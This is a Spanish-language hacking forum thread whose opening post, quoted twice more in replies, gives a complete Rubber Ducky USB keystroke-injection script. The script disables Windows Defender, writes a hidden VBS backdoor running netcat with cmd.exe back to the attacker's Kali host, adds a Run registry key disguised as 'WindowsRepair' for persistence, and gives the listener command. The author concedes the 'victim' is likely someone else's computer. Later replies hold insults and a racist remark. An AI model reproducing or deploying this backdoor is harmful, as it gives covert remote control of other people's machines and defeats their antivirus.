Rubber Ducky | Script para crear acceso remoto a un Windows con Reverse Shell


41rzKPDHGxL._AC_.jpg


En este post vengo a traeros un script para Rubber Ducky que consiste en los siguientes "fragmentos":

· Desactivar Windows Defender desde Estrategias de grupo de Windows.

· Crear el siguiente script:
Código:
Set wshShell = WScript.CreateObject("wscript.shell")
Return = wshShell.Run("""C:\nc.exe"" laipdetukalilinux 8484 -e ""C:\WINDOWS\system32\cmd.exe""", 0, false)

· Crear un registro de auditoria en la ruta Equipo\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run para que ejecute el script al acceder al usuario.

· Mover desde un PENDRIVE el programa nc.exe al directorio que elijáis.

Lo que hará esce srcipt VBS es conectar al ordenador de la "víctima" a una IPv4 y un host con el programa NetCat (nc.exe), tu, desde la Terminal de kali linux, podrás acceder a la CMD del usuario de la "víctima".

·(Pongo víctima entre comillas porque este script yo lo uso por mero aprendizage y aburrimiento, pero esto es para hacerlo con 2 ordenadores, así que el otro ordenador o es tuyo, o es de alguien que quieras tener acceso a su CMD, y dudo que sea para hacer algo "ético", aunque si quieres trolear un poco a algún colega, está entretenido).

Bien, ahora que he explicado en que consiste el script VBS, explicaré el script de Rubber Ducky, el script que se ejecutará para hacer todo el proceso de la creación del script VBS y demás.

El script es el siguiente: (IGNORAD LOS GUIÓNES, SON PARA SEPARAR EN FRAGMENTOS CADA FUNCIÓN DEL SCRIPT, SI COPIÁIS Y PEGÁIS EL SCRIPT, NO OLVIDÉIS QUITAR LOS GUIÓNES Y CAMBIAR LOS DATOS DE LA VÍCITMA Y TUYOS, OSEA, DIRECTORIOS, IPS, DISCPS...)

Voy a explicar cada fragmento del código:
Código:
DELAY 500
GUI d
DELAY 200
GUI r
DELAY 500
STRING gpedit.msc
ENTER
DELAY 500
STRING Pla
RIGHTARROW
DELAY 100
STRING Compo
RIGHTARROW
DELAY 100
STRING Antiv
RIGHTARROW
DELAY 500
TAB
RIGHTARROW
DELAY 500
STRING Desa
DELAY 100
ENTER
DELAY 400
STRING E
DELAY 200
ENTER
Este fragmento lo que hace es acceder a las estrategias de grupo y desactivar el Windows Defender (para que se aplique, se debe reiniciar el equipo, por tanto, al introducir el Rubber Ducky, lo desconectaremos cuando haya terminado de hacer este fragmento, para luego poder conectarlo de nuevo y que el Wndows Defender no bloquee el SCRIPT VBS y el programa NC.EXE (NetCat).
Código:
DELAY 1000
GUI d
DELAY 500
GUI r
DELAY 500
STRING cmd
DELAY 300
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 1000
STRING cd/
ENTER
STRING copy con backdoor.vbs
ENTER
STRING Set wshShell = WScript.CreateObject("wscript.shell")
ENTER
STRING Return = wshShell.Run("""C:\nc.exe"" laipdetukalilinux 8484 -e ""C:\WINDOWS\system32\cmd.exe""", 0, false)
ENTER
CTRL C
DELAY 1000
Este fragmento lo que hace es entrar a la CMD con administrador desde el Windows R para luego crear el SCRIPT VBS en el la partición que haya por defecto en la CMD, en este caso, C:\.
Código:
STRING cd/
ENTER
DELAY 1000
STRING REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsRepair /t REG_SZ /d "C:\backdoor.vbs"
DELAY 1000
ENTER
Este fragmento lo que hace es crear un registro de auditoria el cual ejecuta el script VBS al encenderse el equipo/acceder al usuario, donde pone WindowsRepair, será el nombre que tenga la clave, podéis poner el que queráis.
Código:
DELAY 1000
STRING cls
ENTER
DELAY 1000
STRING E:
ENTER
STRING cd Netcat Backdoor
ENTER
STRING copy nc.exe "C:\"
ENTER
DELAY 2000
STRING shutdown -s -t 5
ENTER
Este último fragmento lo que hace es ir al disco E: (EN EL SCRIPT DEBERÁS PONER LA LETRA QUE SE VAYA A ASIGNAR A TU PENDRIVE, SI EL ORDENADOR DE LA VÍCTIMA TIENE EL DISCO C Y D, TU PENDRIVE SERÁ EL E, SI TU VÍCTIMA SOLO TIENE EL DISCO C, SERÁ LA LETRA D, TU PENDRIVE SERÁ LA SIGUIENTE LETRA DEL ABECEDARIO QUE NO ESTÉ ASIGNADA, SI EN EL ORDENADOR HAY EL DISCO C, Y LA Z, TU LETRA SERÁ LA F, PORQUE? PORQUE LA Z OCUPA EL ESPACIO DE LA E EN EL ABECEDARIO POR ASÍ DECIRLO, SI NO LO ENTENDÉIS NO TENGO PROBLEMA EN EXPLICARLO MÁS DETALLADAMENTE Y CON FOTOS POR MD, COMENTARIOS O LO QUE SEA.

Lo dicho, va al disco E: (o al que tu le hayas asignado) y moverá el programa nc.exe al disco C:, el programa nc.exe debe estar en una carpeta que se llame Netcat Backdoor (dentro del pendrive).

Por último apagará el ordenador para que la víctima tenga que encenderlo de nuevo y el script se ejecute.

Bien, una vez hecho todo esto, ahora toca entrar en acción, una vez que el rubberducky haya ejecutado el script entero (cuando se haya apagado el ordenador) iremos al a terminal de Kali Linux, y pondremos lo siguiente: nc -lvp 8484, le damos a ENTER, y lo dejamos así hasta que salga la CMD de la "víctima", la CMD os saldrá en la terminal cuando el ordenador donde está el script/virus se encienda (cuando inicie sesión en el usuario).


Este script de Rubber Ducky, lo que hace es automatizar este proceso:


El vídeo es de @Khea.

Cualquier duda ponedlo en los comentarios o habladme por MD.
 

Anon

🏴‍☠️
Owner
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
Queda mejor para esste tipo de posts que uses el formato artículo pero buen post 👍🏻
 
  • Like
Reacciones : Dark

Argos16

Tengo el miembro muy activo
Noderador
Nodero
Noder
Me gusta que el codigo entero este modo "like to see" pero por partes se ve igual xd
 

Dark

🔥root313🔥
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder Pro
Noder
Me gusta que el codigo entero este modo "like to see" pero por partes se ve igual xd
Está hecho así a proposito, si quieres copiar el código sin dar like, tendrás que ir copiando cada fragmento, en vez de copiarlo todo de una, siempre lo hago así con los códigos (si luego lo separo por partes)
 
  • Like
Reacciones : Argos16

Thegjv

Moder fav <3
Noderador
Nodero
Noder
La verdad es que no me esperaba un rubber ducky de este estilo, te la has sacado junto a @Khea . Es lo bonito de esta herramienta, que te permita ya no solo automatizar procesos sino entenderlos y aprender aún más, eso si, aprendizage? Pa pegarte una paliza.
 
  • Like
Reacciones : Dark y Anon

Dark

🔥root313🔥
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder Pro
Noder
La verdad es que no me esperaba un rubber ducky de este estilo, te la has sacado junto a @Khea . Es lo bonito de esta herramienta, que te permita ya no solo automatizar procesos sino entenderlos y aprender aún más, eso si, aprendizage? Pa pegarte una paliza.
no se hahahhaa, lo he redactado en clase y no estaba yo muy pensador. Vi ese "proceso" en el stream de khea, y quise intentar automatizarlo, le añadí lo de mover el nc.exe desde un pendrive y desactivar el Wndows Defender.
 
  • Maravilloso
Reacciones : Thegjv

Thegjv

Moder fav <3
Noderador
Nodero
Noder
no se hahahhaa, lo he redactado en clase y no estaba yo muy pensador. Vi ese "proceso" en el stream de khea, y quise intentar automatizarlo, le añadí lo de mover el nc.exe desde un pendrive y desactivar el Wndows Defender.
No si está super bien pensado, es darle una vuelta de tuerca al final :)
 

Matrix-LMX

Paz y amor
Nodero
Noder
41rzKPDHGxL._AC_.jpg


En este post vengo a traeros un script para Rubber Ducky que consiste en los siguientes "fragmentos":

· Desactivar Windows Defender desde Estrategias de grupo de Windows.

· Crear el siguiente script:
Código:
Set wshShell = WScript.CreateObject("wscript.shell")
Return = wshShell.Run("""C:\nc.exe"" laipdetukalilinux 8484 -e ""C:\WINDOWS\system32\cmd.exe""", 0, false)

· Crear un registro de auditoria en la ruta Equipo\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run para que ejecute el script al acceder al usuario.

· Mover desde un PENDRIVE el programa nc.exe al directorio que elijáis.

Lo que hará esce srcipt VBS es conectar al ordenador de la "víctima" a una IPv4 y un host con el programa NetCat (nc.exe), tu, desde la Terminal de kali linux, podrás acceder a la CMD del usuario de la "víctima".

·(Pongo víctima entre comillas porque este script yo lo uso por mero aprendizage y aburrimiento, pero esto es para hacerlo con 2 ordenadores, así que el otro ordenador o es tuyo, o es de alguien que quieras tener acceso a su CMD, y dudo que sea para hacer algo "ético", aunque si quieres trolear un poco a algún colega, está entretenido).

Bien, ahora que he explicado en que consiste el script VBS, explicaré el script de Rubber Ducky, el script que se ejecutará para hacer todo el proceso de la creación del script VBS y demás.

El script es el siguiente: (IGNORAD LOS GUIÓNES, SON PARA SEPARAR EN FRAGMENTOS CADA FUNCIÓN DEL SCRIPT, SI COPIÁIS Y PEGÁIS EL SCRIPT, NO OLVIDÉIS QUITAR LOS GUIÓNES Y CAMBIAR LOS DATOS DE LA VÍCITMA Y TUYOS, OSEA, DIRECTORIOS, IPS, DISCPS...)
*** Hidden text: cannot be quoted. ***

Voy a explicar cada fragmento del código:
Código:
DELAY 500
GUI d
DELAY 200
GUI r
DELAY 500
STRING gpedit.msc
ENTER
DELAY 500
STRING Pla
RIGHTARROW
DELAY 100
STRING Compo
RIGHTARROW
DELAY 100
STRING Antiv
RIGHTARROW
DELAY 500
TAB
RIGHTARROW
DELAY 500
STRING Desa
DELAY 100
ENTER
DELAY 400
STRING E
DELAY 200
ENTER
Este fragmento lo que hace es acceder a las estrategias de grupo y desactivar el Windows Defender (para que se aplique, se debe reiniciar el equipo, por tanto, al introducir el Rubber Ducky, lo desconectaremos cuando haya terminado de hacer este fragmento, para luego poder conectarlo de nuevo y que el Wndows Defender no bloquee el SCRIPT VBS y el programa NC.EXE (NetCat).
Código:
DELAY 1000
GUI d
DELAY 500
GUI r
DELAY 500
STRING cmd
DELAY 300
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 1000
STRING cd/
ENTER
STRING copy con backdoor.vbs
ENTER
STRING Set wshShell = WScript.CreateObject("wscript.shell")
ENTER
STRING Return = wshShell.Run("""C:\nc.exe"" laipdetukalilinux 8484 -e ""C:\WINDOWS\system32\cmd.exe""", 0, false)
ENTER
CTRL C
DELAY 1000
Este fragmento lo que hace es entrar a la CMD con administrador desde el Windows R para luego crear el SCRIPT VBS en el la partición que haya por defecto en la CMD, en este caso, C:\.
Código:
STRING cd/
ENTER
DELAY 1000
STRING REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsRepair /t REG_SZ /d "C:\backdoor.vbs"
DELAY 1000
ENTER
Este fragmento lo que hace es crear un registro de auditoria el cual ejecuta el script VBS al encenderse el equipo/acceder al usuario, donde pone WindowsRepair, será el nombre que tenga la clave, podéis poner el que queráis.
Código:
DELAY 1000
STRING cls
ENTER
DELAY 1000
STRING E:
ENTER
STRING cd Netcat Backdoor
ENTER
STRING copy nc.exe "C:\"
ENTER
DELAY 2000
STRING shutdown -s -t 5
ENTER
Este último fragmento lo que hace es ir al disco E: (EN EL SCRIPT DEBERÁS PONER LA LETRA QUE SE VAYA A ASIGNAR A TU PENDRIVE, SI EL ORDENADOR DE LA VÍCTIMA TIENE EL DISCO C Y D, TU PENDRIVE SERÁ EL E, SI TU VÍCTIMA SOLO TIENE EL DISCO C, SERÁ LA LETRA D, TU PENDRIVE SERÁ LA SIGUIENTE LETRA DEL ABECEDARIO QUE NO ESTÉ ASIGNADA, SI EN EL ORDENADOR HAY EL DISCO C, Y LA Z, TU LETRA SERÁ LA F, PORQUE? PORQUE LA Z OCUPA EL ESPACIO DE LA E EN EL ABECEDARIO POR ASÍ DECIRLO, SI NO LO ENTENDÉIS NO TENGO PROBLEMA EN EXPLICARLO MÁS DETALLADAMENTE Y CON FOTOS POR MD, COMENTARIOS O LO QUE SEA.

Lo dicho, va al disco E: (o al que tu le hayas asignado) y moverá el programa nc.exe al disco C:, el programa nc.exe debe estar en una carpeta que se llame Netcat Backdoor (dentro del pendrive).

Por último apagará el ordenador para que la víctima tenga que encenderlo de nuevo y el script se ejecute.

Bien, una vez hecho todo esto, ahora toca entrar en acción, una vez que el rubberducky haya ejecutado el script entero (cuando se haya apagado el ordenador) iremos al a terminal de Kali Linux, y pondremos lo siguiente: nc -lvp 8484, le damos a ENTER, y lo dejamos así hasta que salga la CMD de la "víctima", la CMD os saldrá en la terminal cuando el ordenador donde está el script/virus se encienda (cuando inicie sesión en el usuario).


Este script de Rubber Ducky, lo que hace es automatizar este proceso:


El vídeo es de @Khea.

Cualquier duda ponedlo en los comentarios o habladme por MD.
Ya van 3 posts de rubber ducky, farmer asqueroso de mierda
TE QUIERO
 

Dark

🔥root313🔥
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder Pro
Noder
Ya van 3 posts de rubber ducky, farmer asqueroso de mierda
TE QUIERO
Te das cuenta de lo gilipollas que pareces diciéndome farmer por 3 posts currados de una herramienta de Hacking? El farmer aquí eres tu hahahaha, que no puedes comentar otra cosa salvo llamarme farmer... En fin, la hipocresía (no va a malas, pero te puedes meter un cigarro encendido por el ano).

Osea, no se, mira la longitud de este post, es todo redactado 100% por mi, este será el segundo post que hago este mes, (segundo o tercero),

Con todo esto, no quiero defenderme a mi de que no estoy farmeando, sino decirte a ti que, donde coño ves el farming? Yo solo lo veo en tu comentario. :devilish: ✅🔥❤️
 

Matrix-LMX

Paz y amor
Nodero
Noder
Te das cuenta de lo gilipollas que pareces diciéndome farmer por 3 posts currados de una herramienta de Hacking? El farmer aquí eres tu hahahaha, que no puedes comentar otra cosa salvo llamarme farmer... En fin, la hipocresía (no va a malas, pero te puedes meter un cigarro encendido por el ano).

Osea, no se, mira la longitud de este post, es todo redactado 100% por mi, este será el segundo post que hago este mes, (segundo o tercero),

Con todo esto, no quiero defenderme a mi de que no estoy farmeando, sino decirte a ti que, donde coño ves el farming? Yo solo lo veo en tu comentario. :devilish: ✅🔥❤️
Dark como siempre un llorica, no se le puede decir nada en broma, perdón no sabía que eras de cristal
 

Dark

🔥root313🔥
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder Pro
Noder
Dark como siempre un llorica, no se le puede decir nada en broma, perdón no sabía que eras de cristal
No me salgas con esas escusa, no se si lo habrás visto pero he añadido unos iconos MDLR para que se note mi parte de buen rollo en el mensaje, y esa escusa de "no se te puede hacer una broma", vale tío, tienes 12 años, tío, aceptalo, estabas farmeando y ya, no es que me puedas hacer una broma o no, es que estás farmeando llamandome farmer en un post más largo que la polla de un africano, no puedes aceptarlo y callarte? Podría haberte borrado el mensaje por farming sin más, pero he preferido explicarte el porque lo que dices no tiene ningún tipo de sentido, y estás siendo hipócrita, y no digas que es una coña porque... Es que no, tu y yo sabemos que no ibas en coña, en ese momento te ha parecido que estoy a tope subiendo posts, que soy un farmer y ya.
 

Matrix-LMX

Paz y amor
Nodero
Noder
Si quieres hacer shitpost, ve a Off Topic o General.
No me salgas con esas escusa, no se si lo habrás visto pero he añadido unos iconos MDLR para que se note mi parte de buen rollo en el mensaje, y esa escusa de "no se te puede hacer una broma", vale tío, tienes 12 años, tío, aceptalo, estabas farmeando y ya, no es que me puedas hacer una broma o no, es que estás farmeando llamandome farmer en un post más largo que la polla de un africano, no puedes aceptarlo y callarte? Podría haberte borrado el mensaje por farming sin más, pero he preferido explicarte el porque lo que dices no tiene ningún tipo de sentido, y estás siendo hipócrita, y no digas que es una coña porque... Es que no, tu y yo sabemos que no ibas en coña, en ese momento te ha parecido que estoy a tope subiendo posts, que soy un farmer y ya.
Siendo sincero no lo he hecho para ofenderte pero me has contestado de una manera que me ha dolido, porque al responderme con más palabras me dejas mal delante del foro y eso no lo consiento, eres muy estricto conmigo. A mi no me importan los ndcs yo solo comento pues para hacer el tonto, o ves en este foro a alguien que sea serio? Si solo tu, 🍆.
🌊Es💦que😍no, 😘tu💋y💕yo💓sabemos💘que💟no💚ibas👩‍❤️‍💋‍👨en💛coña🖤en💔ese😞momento😢te😥ha💝parecido😣que😖estoy😫a😞tope😭subiendo😣posts, 😒que😓soy☹️un😪farmer😩y♿ya😑
 

michaelsmith69

Miembro activo
41rzKPDHGxL._AC_.jpg


En este post vengo a traeros un script para Rubber Ducky que consiste en los siguientes "fragmentos":

· Desactivar Windows Defender desde Estrategias de grupo de Windows.

· Crear el siguiente script:
Código:
Set wshShell = WScript.CreateObject("wscript.shell")
Return = wshShell.Run("""C:\nc.exe"" laipdetukalilinux 8484 -e ""C:\WINDOWS\system32\cmd.exe""", 0, false)

· Crear un registro de auditoria en la ruta Equipo\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run para que ejecute el script al acceder al usuario.

· Mover desde un PENDRIVE el programa nc.exe al directorio que elijáis.

Lo que hará esce srcipt VBS es conectar al ordenador de la "víctima" a una IPv4 y un host con el programa NetCat (nc.exe), tu, desde la Terminal de kali linux, podrás acceder a la CMD del usuario de la "víctima".

·(Pongo víctima entre comillas porque este script yo lo uso por mero aprendizage y aburrimiento, pero esto es para hacerlo con 2 ordenadores, así que el otro ordenador o es tuyo, o es de alguien que quieras tener acceso a su CMD, y dudo que sea para hacer algo "ético", aunque si quieres trolear un poco a algún colega, está entretenido).

Bien, ahora que he explicado en que consiste el script VBS, explicaré el script de Rubber Ducky, el script que se ejecutará para hacer todo el proceso de la creación del script VBS y demás.

El script es el siguiente: (IGNORAD LOS GUIÓNES, SON PARA SEPARAR EN FRAGMENTOS CADA FUNCIÓN DEL SCRIPT, SI COPIÁIS Y PEGÁIS EL SCRIPT, NO OLVIDÉIS QUITAR LOS GUIÓNES Y CAMBIAR LOS DATOS DE LA VÍCITMA Y TUYOS, OSEA, DIRECTORIOS, IPS, DISCPS...)
*** Hidden text: cannot be quoted. ***

Voy a explicar cada fragmento del código:
Código:
DELAY 500
GUI d
DELAY 200
GUI r
DELAY 500
STRING gpedit.msc
ENTER
DELAY 500
STRING Pla
RIGHTARROW
DELAY 100
STRING Compo
RIGHTARROW
DELAY 100
STRING Antiv
RIGHTARROW
DELAY 500
TAB
RIGHTARROW
DELAY 500
STRING Desa
DELAY 100
ENTER
DELAY 400
STRING E
DELAY 200
ENTER
Este fragmento lo que hace es acceder a las estrategias de grupo y desactivar el Windows Defender (para que se aplique, se debe reiniciar el equipo, por tanto, al introducir el Rubber Ducky, lo desconectaremos cuando haya terminado de hacer este fragmento, para luego poder conectarlo de nuevo y que el Wndows Defender no bloquee el SCRIPT VBS y el programa NC.EXE (NetCat).
Código:
DELAY 1000
GUI d
DELAY 500
GUI r
DELAY 500
STRING cmd
DELAY 300
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 1000
STRING cd/
ENTER
STRING copy con backdoor.vbs
ENTER
STRING Set wshShell = WScript.CreateObject("wscript.shell")
ENTER
STRING Return = wshShell.Run("""C:\nc.exe"" laipdetukalilinux 8484 -e ""C:\WINDOWS\system32\cmd.exe""", 0, false)
ENTER
CTRL C
DELAY 1000
Este fragmento lo que hace es entrar a la CMD con administrador desde el Windows R para luego crear el SCRIPT VBS en el la partición que haya por defecto en la CMD, en este caso, C:\.
Código:
STRING cd/
ENTER
DELAY 1000
STRING REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsRepair /t REG_SZ /d "C:\backdoor.vbs"
DELAY 1000
ENTER
Este fragmento lo que hace es crear un registro de auditoria el cual ejecuta el script VBS al encenderse el equipo/acceder al usuario, donde pone WindowsRepair, será el nombre que tenga la clave, podéis poner el que queráis.
Código:
DELAY 1000
STRING cls
ENTER
DELAY 1000
STRING E:
ENTER
STRING cd Netcat Backdoor
ENTER
STRING copy nc.exe "C:\"
ENTER
DELAY 2000
STRING shutdown -s -t 5
ENTER
Este último fragmento lo que hace es ir al disco E: (EN EL SCRIPT DEBERÁS PONER LA LETRA QUE SE VAYA A ASIGNAR A TU PENDRIVE, SI EL ORDENADOR DE LA VÍCTIMA TIENE EL DISCO C Y D, TU PENDRIVE SERÁ EL E, SI TU VÍCTIMA SOLO TIENE EL DISCO C, SERÁ LA LETRA D, TU PENDRIVE SERÁ LA SIGUIENTE LETRA DEL ABECEDARIO QUE NO ESTÉ ASIGNADA, SI EN EL ORDENADOR HAY EL DISCO C, Y LA Z, TU LETRA SERÁ LA F, PORQUE? PORQUE LA Z OCUPA EL ESPACIO DE LA E EN EL ABECEDARIO POR ASÍ DECIRLO, SI NO LO ENTENDÉIS NO TENGO PROBLEMA EN EXPLICARLO MÁS DETALLADAMENTE Y CON FOTOS POR MD, COMENTARIOS O LO QUE SEA.

Lo dicho, va al disco E: (o al que tu le hayas asignado) y moverá el programa nc.exe al disco C:, el programa nc.exe debe estar en una carpeta que se llame Netcat Backdoor (dentro del pendrive).

Por último apagará el ordenador para que la víctima tenga que encenderlo de nuevo y el script se ejecute.

Bien, una vez hecho todo esto, ahora toca entrar en acción, una vez que el rubberducky haya ejecutado el script entero (cuando se haya apagado el ordenador) iremos al a terminal de Kali Linux, y pondremos lo siguiente: nc -lvp 8484, le damos a ENTER, y lo dejamos así hasta que salga la CMD de la "víctima", la CMD os saldrá en la terminal cuando el ordenador donde está el script/virus se encienda (cuando inicie sesión en el usuario).


Este script de Rubber Ducky, lo que hace es automatizar este proceso:


El vídeo es de @Khea.

Cualquier duda ponedlo en los comentarios o habladme por MD.